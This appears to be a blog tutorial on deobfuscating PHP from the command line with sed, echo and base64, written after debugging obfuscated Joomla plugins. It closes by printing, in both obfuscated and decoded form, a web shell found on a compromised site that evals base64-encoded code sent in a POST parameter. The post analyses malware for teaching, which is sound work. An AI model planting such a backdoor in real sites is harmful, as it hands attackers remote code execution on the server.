Logo

Command line PHP deobfuscation

Command Line Deobfuscation Linux Desktop Php Reverse Engineering Security Teaching Material

4 minutes

Recently a customer asked me to debug some problems on their Joomla!/PHP site that had interoperability issues after some long time for unknown reasons. The site was using some commercial plugins which producer was long time gone and unreachable and worst of all they were all obfuscated. So even searching for some basic string that was displayed on the screen on error to understand what’s going on was not a straight forward exercise and going through the code was a mess.

Apart from changing the code in a logical way, for example by adding intermediate variables or splitting variable assignations into more operations and so on, the first most annoying part of PHP obfuscators is that they modify most of the characters in the strings values with their respective hexadecimal (format \xXX) or octal (\XXX) values and eliminate any line feeds or code structure. Once you get rid of this the code stays quite very messy but is, at least in the cases I analyzed, quite readable and just needs a little more bookkeeping with automatically named vars to go through.

Getting rid at least of this confusing representation is quite straightforward on the command line with a few tricks.

The proceeding will be shown step by step for sake of clarity, you can of course pipe multiple commands (or unite them using the -e option of sed) and get a single shot operation.

First step we will translate octal \XXX values in PHP notation to the \0XXX notation that is friendly for the echo shell command:

sed s'/\\\([0-9]\)/\\0\1/g' file.php > step1.php

Now we can use echo to interpret the octal reppresentation from the previous step and the hexadecimal values in the \xXX notation already present since the format is same in both PHP and echo:

set -f
echo -e `cat step1.php` > step2.php
set +f

Be aware that we are disabling (and at the end reenabling) the bash wildcard completion with the set command not to expand wildcards present in the file.

Now we put some newlines after the curly brackets (function definitions) so it becames a little more readable:

sed s'/[\{\}]/&\n/g' step2.php > step3.php

Now we can put a newline after “;” character (end of a statement in php) to make it again more readable. But be aware that this may break some mixed HTML/JS code in the PHP file. A better version (but probably not immediate to do it as a command liner) would check that we are out of a quote scope and skip that occourences. You may use the next version to read it better and then eventually work on the previous step file to be sure the PHP didn’t get broken.

sed s'/;/&\n/g' step3.php > final.php

Now we have a quite more readable file than the one we started with. Sure thing we still have a source file which contains just numerical variables or partial assignations but compared to the starting point it’s now a breeze (at least in the sources which I had to analyze which were about 150kb long files in origin) to go through them.

Another thing you’ll sometimes find in obfuscated PHP files, especially in some PHP exploits and such, are parts of strings encoded with base64 and then decoded on the fly with base64_decode and for example passed to an eval() to be executed. In such case from command line you can use the base64 tool with the -d command line switch for a on the fly decoding. As an example of a compromised site I noticed recently (the original code was without newlines and such but I added a few for the sake of clarity):

$_ = "CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0="
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";
$___ ="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));

would result after following the procedures in this article as:

$_ = "CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0="
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";
$___ ="base64_decode";
eval($___($__));

And finally the $_ expands as:

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}

and $__ as:

$code = base64_decode($_);
eval($code);

For the previous two results just use the command (put the string to decode in the quotes):

echo "string" | base64 -d

So the commands passed in the POST parameter code are hideously executed on the system.